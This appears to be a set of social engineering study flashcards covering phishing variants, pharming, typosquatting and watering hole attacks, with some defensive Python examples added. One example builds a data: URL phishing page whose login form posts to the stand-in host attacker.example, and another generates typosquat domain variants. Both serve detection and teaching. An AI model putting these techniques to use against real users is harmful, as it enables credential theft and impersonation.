Social Engineering Flashcards

1
Q

A social engineering technique whereby attackers under disguise of a legitimate request attempt to gain access to confidential information is commonly referred to as:

A

phishing

It’s a type of social engineering attack where attackers pose as trustworthy entities to trick individuals into revealing sensitive information, such as passwords or financial data, or to click on malicious links. It’s a common tactic used to gain unauthorized access to systems or compromise personal information.

2
Q

smishing

A

Smishing is “SMS phishing”: attackers send deceptive text messages (SMS) to trick recipients into providing sensitive information or tapping malicious links. It is the same con as email phishing, but delivered to mobile devices through SMS, where links are harder to inspect and messages from unknown numbers are often trusted.

3
Q

vishing

A

“Vishing” stands for “voice phishing.” It’s a social engineering technique where attackers use phone calls to deceive individuals into providing sensitive information or performing certain actions. They might impersonate trusted entities like banks or government agencies, often with a spoofed caller ID, and use pressure tactics to manipulate victims into divulging personal or financial information. Vishing can also involve automated voice messages prompting recipients to call back and provide information, or to visit a fake website or call a fake number.

4
Q

What type of spam is delivered over instant-messaging (chat) platforms rather than email?

A

SPIM (spam over instant messaging). It is the unsolicited sending of messages over instant messaging platforms. It’s the same nuisance as email spam, but arrives through instant messaging services, where there is usually less filtering and links are often clicked on sight.

5
Q

SPIT

A

“SPIT” stands for “Spam over Internet Telephony.”

An example of SPIT could be receiving unsolicited automated voice messages advertising a product or service over a Voice over Internet Protocol (VoIP) service. For instance, you might receive a call promoting a dubious investment opportunity or offering a fake prize in exchange for personal information. These messages are similar to traditional email spam but are transmitted through voice channels instead.

6
Q

Bluesnarfing

A

Bluesnarfing is a type of cyberattack where unauthorized access is gained to a Bluetooth-enabled device, such as a smartphone, tablet, or laptop, to steal data. It typically involves exploiting vulnerabilities in the Bluetooth protocol to access the device’s data, such as contacts, text messages, emails, and files, without the user’s knowledge or consent. Attackers can use this stolen information for various malicious purposes, including identity theft, financial fraud, or corporate espionage.

7
Q

spear phishing

A

Spear phishing is a targeted form of phishing where attackers tailor their messages to specific individuals or organizations. Unlike traditional phishing attacks that cast a wide net, spear phishing emails are customized to appear more credible and personalized, often using information obtained from social media or other sources.

8
Q

Dumpster Diving

A

The term “dumpster diving” describes sifting through trash for discarded documents containing sensitive data. Documents giving employees’ names, the positions they hold in the company and similar details can be used to make a social engineering attack (an impersonation call, for instance) more convincing. Having documents shredded or incinerated before disposal makes dumpster diving far less effective and reduces the risk of such attacks.

9
Q

pharming

A

Pharming is a cyberattack where attackers manipulate the Domain Name System (DNS) or compromise a user’s hosts file to redirect them to a fake website, typically designed to mimic a legitimate one. The goal of pharming is to trick users into visiting the fake website, where they may unknowingly enter sensitive information such as login credentials, credit card numbers, or personal details. This stolen information can then be used for various malicious purposes, such as identity theft or financial fraud. Pharming attacks can be particularly dangerous because they can be difficult for users to detect since they are redirected to fraudulent sites without their knowledge or consent.
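The hosts-file variant described above is the easiest one to check for on an endpoint: any entry that maps a sensitive domain to a routable address is a redirect the user never asked for. The following added example (not part of the original deck) parses a hosts file and flags such overrides. The file content, the watched domain list and the 203.0.113.45 address are constructed for illustration; 203.0.113.0/24 is a documentation range, not a real host.

```python
"""Find hosts-file overrides that redirect watched domains (added example)."""
import ipaddress

# Constructed hosts-file content. The 203.0.113.45 line is the kind of entry
# pharming malware plants; the others are normal local entries.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost
192.168.1.10    nas.home            # benign local override
0.0.0.0         ads.tracker.example # sinkhole entry from an ad blocker
203.0.113.45    www.bank.example bank.example
"""

# Constructed: domains whose resolution should never come from the hosts file.
WATCHED_DOMAINS = {"bank.example", "www.bank.example", "mail.example.com"}


def parse_hosts(text):
    """Return (address, hostname) pairs; comments, blank and malformed lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue  # not a hosts entry, e.g. a stray word
        entries.extend((addr, name.lower()) for name in names)
    return entries


def find_hosts_hijacks(text, watched=WATCHED_DOMAINS):
    """Watched names mapped to a routable address are redirects, not blocklist entries."""
    hijacks = []
    for addr, name in parse_hosts(text):
        if name not in watched:
            continue
        if addr.is_loopback or addr.is_unspecified:
            continue  # 127.0.0.1 / ::1 / 0.0.0.0 merely sinkhole the name
        hijacks.append((name, str(addr)))
    return hijacks


if __name__ == "__main__":
    # On a live system read /etc/hosts (Linux, macOS) or
    # C:\Windows\System32\drivers\etc\hosts (Windows) instead of SAMPLE_HOSTS.
    for name, addr in find_hosts_hijacks(SAMPLE_HOSTS):
        print(f"{name} is overridden to {addr}")
```

The loopback/unspecified exclusion matters: ad blockers and parental-control tools legitimately pin domains to 127.0.0.1 or 0.0.0.0, and alerting on those would bury the real redirect. DNS-level pharming (a poisoned resolver or a changed DHCP-supplied DNS server) is not visible in this file; catching that requires comparing the local resolver’s answer for a watched domain against a trusted resolver, which this offline example does not attempt.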

10
Q

elicitation

A

Elicitation is a technique used by attackers to gather information from individuals or organizations through subtle and indirect means. It involves skillfully extracting information by asking leading questions, engaging in casual conversation, or leveraging psychological tactics without arousing suspicion.

10
Q

whaling

A

While both spear phishing and whaling are targeted phishing attacks, spear phishing focuses on specific individuals or groups within an organization, whereas whaling targets high-profile individuals such as executives, who have greater authority (for example, the power to approve a wire transfer) and access to more valuable resources.

11
Q

typosquatting / url hijacking

A

Typosquatting, also known as URL hijacking, is a malicious tactic where attackers register domain names that are similar to legitimate ones but contain slight misspellings or typographical errors. These deceptive domain names are often used to trick users who mistype or misspell a website’s URL into visiting the attacker-controlled site instead of the intended destination.
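The practical questions on the defensive side are “which variants should we register or monitor?” and “is this newly seen domain imitating ours?”. The following added example (not from the original deck) answers both: it generates the classic typo families (omission, repetition, transposition, homoglyph swap, wrong TLD) and flags observed domains within one edit of a protected brand after undoing homoglyph tricks. The protected domains, the homoglyph table and the observed list are constructed assumptions for illustration.

```python
"""Typosquat generation and lookalike detection (added example, not from the deck)."""

# Constructed: domains the organisation owns and wants to protect (assumption).
PROTECTED = ["example.com", "examplebank.com"]

# Constructed: substitutions that look alike in many fonts or are easy to mistype.
HOMOGLYPHS = {"l": "1", "o": "0", "m": "rn", "w": "vv", "e": "3"}
# Reverse map used to normalise a candidate before measuring edit distance.
UNGLYPH = {"rn": "m", "vv": "w", "1": "l", "0": "o", "3": "e"}


def split_domain(domain):
    """Return (label, tld) for a simple two-part name such as 'example.com'."""
    label, _, tld = domain.lower().rpartition(".")
    return label, tld


def typosquat_variants(domain):
    """Generate the typo families an attacker typically registers for `domain`."""
    label, tld = split_domain(domain)
    labels = set()
    for i in range(len(label)):
        labels.add(label[:i] + label[i + 1:])            # omission:   exmple
        labels.add(label[:i] + label[i] + label[i:])     # repetition: exaample
        if label[i] in HOMOGLYPHS:                       # homoglyph:  examp1e
            labels.add(label[:i] + HOMOGLYPHS[label[i]] + label[i + 1:])
    for i in range(len(label) - 1):                      # transposition: examlpe
        labels.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    variants = {f"{lab}.{tld}" for lab in labels if lab}
    variants |= {f"{label}.{alt}" for alt in ("co", "cm", "om", "net")}  # wrong TLD
    variants.discard(domain.lower())
    return variants


def normalise(label):
    """Undo common homoglyph substitutions so 'exarnp1e' compares as 'example'."""
    for glyph, plain in UNGLYPH.items():
        label = label.replace(glyph, plain)
    return label


def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute, adjacent swap."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def flag_lookalikes(observed, protected=PROTECTED, max_distance=1):
    """Map each suspicious observed domain to the protected domain it imitates."""
    owned = {p.lower() for p in protected}
    flagged = {}
    for dom in observed:
        dom = dom.lower()
        if dom in owned:
            continue
        label, _ = split_domain(dom)
        for p in protected:
            plabel, _ = split_domain(p)
            if edit_distance(normalise(label), normalise(plabel)) <= max_distance:
                flagged[dom] = p
                break
    return flagged


# Constructed: domains seen in proxy logs or a new-registration feed.
OBSERVED = ["examp1e.com", "exarnple.com", "examlpe.com", "example.co",
            "github.com", "example.com"]

if __name__ == "__main__":
    print(sorted(typosquat_variants("example.com")))
    print(flag_lookalikes(OBSERVED))
```

Normalising before measuring is what catches “exarnple” (r+n for m) and “examp1e”, which are zero edits away from the brand once the glyphs are undone; the cost is that an unrelated label containing “rn” is also folded, so treat hits as candidates for review rather than proof. For real brand monitoring the variant list is the seed for registrar and certificate-transparency watches, and the distance threshold should be tuned per label length.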

12
Q

data URL phishing

A

In data URL phishing the attacker does not host the phishing page on a web server at all: the page (usually an HTML login form, typically base64-encoded) is embedded in the link itself using the data: URI scheme, e.g. data:text/html;base64,… . Because there is no hostname to resolve and no domain to look up, URL-reputation filters and domain blocklists have nothing to match, and the victim sees a link that simply opens a page. The harvested credentials are then posted from that embedded form to a server the attacker controls.
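The following added example (not part of the original deck) shows both halves of the technique: how a credential form is packed into a data: link, and how a mail filter can unpack such links and judge what they embed. The phishing page, the sample email and the host attacker.example are constructed for illustration.

```python
"""Inspect links in an HTML message for data: URLs that embed a phishing page."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed: the page an attacker would embed. attacker.example is a
# placeholder host, not a real site.
PHISH_PAGE = (
    "<html><body><h2>Your session has expired</h2>"
    '<form method="post" action="https://attacker.example/collect">'
    '<input name="user" placeholder="Email">'
    '<input name="pass" type="password" placeholder="Password">'
    "<button>Sign in</button></form></body></html>"
)


def make_data_url(html_page, mediatype="text/html"):
    """Build the self-contained link used in data URL phishing (RFC 2397 form)."""
    encoded = base64.b64encode(html_page.encode("utf-8")).decode("ascii")
    return f"data:{mediatype};base64,{encoded}"


# Constructed sample email body: one data: link, one ordinary https link.
SAMPLE_EMAIL = (
    '<p>Your mailbox is almost full. <a href="' + make_data_url(PHISH_PAGE)
    + '">Sign in to free space</a>.</p>'
    '<p>Questions? Visit the <a href="https://help.example.com/mail">support portal</a>.</p>'
)


class LinkExtractor(HTMLParser):
    """Collect href/src targets of anchors, image-map areas and iframes."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag in ("a", "area", "iframe"):
            for name, value in attrs:
                if name in ("href", "src") and value:
                    self.links.append(value.strip())


def extract_links(html):
    parser = LinkExtractor()
    parser.feed(html)
    return parser.links


def decode_data_url(url):
    """Return (mediatype, payload bytes) for a data: URL, or None for any other scheme."""
    if url[:5].lower() != "data:":
        return None
    header, sep, data = url[5:].partition(",")
    if not sep:
        return None  # no payload separator: malformed data URL
    params = [p.strip() for p in header.split(";")]
    mediatype = params[0] or "text/plain"
    if any(p.lower() == "base64" for p in params[1:]):
        try:
            payload = base64.b64decode(data)
        except ValueError:
            return None  # bad padding; nothing a browser would render either
    else:
        payload = unquote(data).encode("utf-8")
    return mediatype, payload


def analyse_links(html):
    """Report every data: link and whether its embedded content harvests credentials."""
    findings = []
    for link in extract_links(html):
        decoded = decode_data_url(link)
        if decoded is None:
            continue
        mediatype, payload = decoded
        body = payload.decode("utf-8", errors="replace").lower()
        findings.append({
            "mediatype": mediatype,
            "embedded_bytes": len(payload),
            "has_form": "<form" in body,
            "asks_password": bool(re.search(r"type\s*=\s*['\"]?password", body)),
            "posts_to": re.findall(r"action\s*=\s*['\"]([^'\"]+)", body),
        })
    return findings


if __name__ == "__main__":
    for finding in analyse_links(SAMPLE_EMAIL):
        print(finding)
```

The useful detail for a filter is the form’s action attribute: the data: link has no hostname, but the embedded form still has to post somewhere, and that destination is what can be blocklisted or checked for reputation. Current desktop browsers refuse top-frame navigation to data: URLs that come from a page or mail client, so the link most often does its work when opened from an attachment, a webmail preview or an older client; the filtering logic is the same in every case.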

13
Q

prepending

A

Prepending is adding something to the front of a message or link so that it is trusted or handled differently: for example putting “RE:” or “FW:” on a subject line so the mail looks like part of an existing conversation, or a tag such as “SAFE” or “[INTERNAL]” that mimics the labels a mail gateway adds. In the context of links, the term is also used for an attacker-supplied prefix at the start of a URL, such as the data: scheme of a data URL phishing link, so that the true target of the link is not obvious to the reader.

14
Q

Virus hoax

A

An email message containing a warning related to a non-existent computer security threat, asking a user to delete system files falsely identified as malware, and/or prompting them to share the message

15
Q

Which social engineering attack relies on identity theft?

A

Impersonation is a technique used in various contexts, including cyberattacks, where an individual or entity pretends to be someone else in order to deceive others or gain unauthorized access to information or resources. In cybersecurity, impersonation often involves posing as a legitimate user, system, or organization (a help-desk technician, a vendor, a colleague) to trick individuals into disclosing sensitive information, granting access to systems, or performing certain actions.

16
Q

Watering hole attack

A

A watering hole attack is a type of cyberattack that targets a specific group of users by compromising websites that they frequently visit. The attackers identify websites that are regularly visited by the target group, often referred to as the “watering hole,” and then infect these websites with malware or malicious code.

When users from the targeted group visit these compromised websites, their devices may become infected with malware without their knowledge. This malware can then be used to steal sensitive information, gain unauthorized access to systems, or carry out other malicious activities.

17
Q

How to mitigate watering hole attacks

A

Mitigating watering hole attacks requires a combination of measures, including regular security updates and patches, the use of web filtering and antivirus software, and employee training to recognize and avoid suspicious websites. Additionally, website owners should implement robust security measures to prevent their sites from being compromised in the first place.